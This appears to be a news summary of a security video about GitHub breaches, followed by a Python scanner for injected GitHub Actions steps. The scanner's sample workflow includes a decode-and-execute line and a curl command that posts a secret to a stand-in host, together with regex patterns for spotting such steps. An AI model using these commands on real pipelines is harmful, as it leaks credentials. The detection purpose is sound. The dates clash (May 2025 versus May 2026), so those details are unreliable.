
GitHub Faces Major Security Breaches in May 2025
🎬 GitHub faced two major security incidents in May 2025. The first was the "Megalodon" campaign, in which attackers used automated commits to inject Base64-encoded bash payloads into GitHub Actions workflow files across 5,561 repositories, exfiltrating CI secrets, cloud credentials, SSH keys, and OIDC tokens to a command-and-control (C2) server. The attack leveraged compromised personal access tokens or deploy keys; the threat actors forged identities with throwaway accounts and disguised the injected commits with routine CI-maintenance commit messages. Hudson Rock's analysis linked 33% of the 978 unique usernames to prior infostealer infections, suggesting that stolen credentials were reused.

Separately, GitHub's internal repositories were breached after an employee installed a malicious VS Code extension ("NX Console"), leading to the exfiltration of 38,000 private repos, including customer support data. The attack was attributed to "Team PCP," who later offered the stolen data for sale for a minimum of $50,000. GitHub detected the breach on May 18, 2026, and rotated high-impact credentials. Meanwhile, CISA inadvertently exposed sensitive credentials, including AWS GovCloud tokens, in a public GitHub repo created in November 2025.

In other news, OpenAI partnered with 1Password to let AI coding agents access credentials securely, and Discord made end-to-end encryption mandatory for voice and video calls. The video also celebrated Hak5's 21st anniversary and 1 million YouTube subscribers.
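The Megalodon technique described above (a Base64 blob decoded and piped into a shell from inside a workflow file) is easy to hunt for in a repository's `.github/workflows/` directory. The scanner below is an added example written for this summary; it is not code from the video, from GitHub, or from Hudson Rock, and the detection patterns are heuristics chosen here rather than published indicators. The two workflow files are constructed samples, and the Base64 payload is a harmless placeholder string.

```python
import base64
import re
from dataclasses import dataclass

# Constructed placeholder payload: a harmless string, encoded only so the sample
# workflow contains a Base64 blob of realistic length (60 characters).
PLACEHOLDER_B64 = base64.b64encode(b"echo placeholder payload for detection demo").decode()

# Constructed benign workflow: checkout, install, test.
BENIGN_WORKFLOW = """\
name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

# Constructed suspect workflow: an injected decode-and-execute step plus a step that
# sends a repository secret to an external host (example.invalid is a reserved name).
SUSPECT_WORKFLOW = """\
name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo __B64__ | base64 -d | bash
      - run: curl -s -X POST https://example.invalid/collect -d "${{ secrets.AWS_SECRET_ACCESS_KEY }}"
      - run: npm ci && npm test
""".replace("__B64__", PLACEHOLDER_B64)

# Heuristic rules (assumptions made for this example, not official indicators):
#  - a base64 decode whose output is piped straight into an interpreter
#  - a long Base64-looking literal anywhere in the file
#  - a network client invoked on the same line as a ${{ secrets.* }} reference
DECODE_EXEC = re.compile(
    r"base64\s+(?:-d|--decode|-D)\b[^|\n]*\|\s*(?:sudo\s+)?(?:bash|sh|zsh|python3?|perl)\b"
)
LONG_B64 = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
SECRET_TO_NETWORK = re.compile(r"\b(?:curl|wget)\b[^\n]*\$\{\{\s*secrets\.")

RULES = [
    ("decode-and-execute", DECODE_EXEC),
    ("long-base64-literal", LONG_B64),
    ("secret-in-network-command", SECRET_TO_NETWORK),
]


@dataclass(frozen=True)
class Finding:
    line: int   # 1-based line number within the workflow file
    rule: str   # which heuristic fired
    text: str   # the offending line, stripped


def scan_workflow(text: str) -> list[Finding]:
    """Return every (line, rule) hit in a workflow file; an empty list means clean."""
    findings: list[Finding] = []
    for number, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(number, rule, line.strip()))
    return findings


if __name__ == "__main__":
    for name, content in (("benign", BENIGN_WORKFLOW), ("suspect", SUSPECT_WORKFLOW)):
        hits = scan_workflow(content)
        print(f"{name}: {len(hits)} finding(s)")
        for hit in hits:
            print(f"  line {hit.line:>3}  {hit.rule:<28} {hit.text}")
```

The long-literal rule will also fire on legitimate embedded keys or certificates, so it is a triage signal rather than a verdict; the decode-and-execute rule is the higher-confidence one. Run the scanner over every file under `.github/workflows/` and diff its output between a known-good commit and the current head to spot newly injected steps.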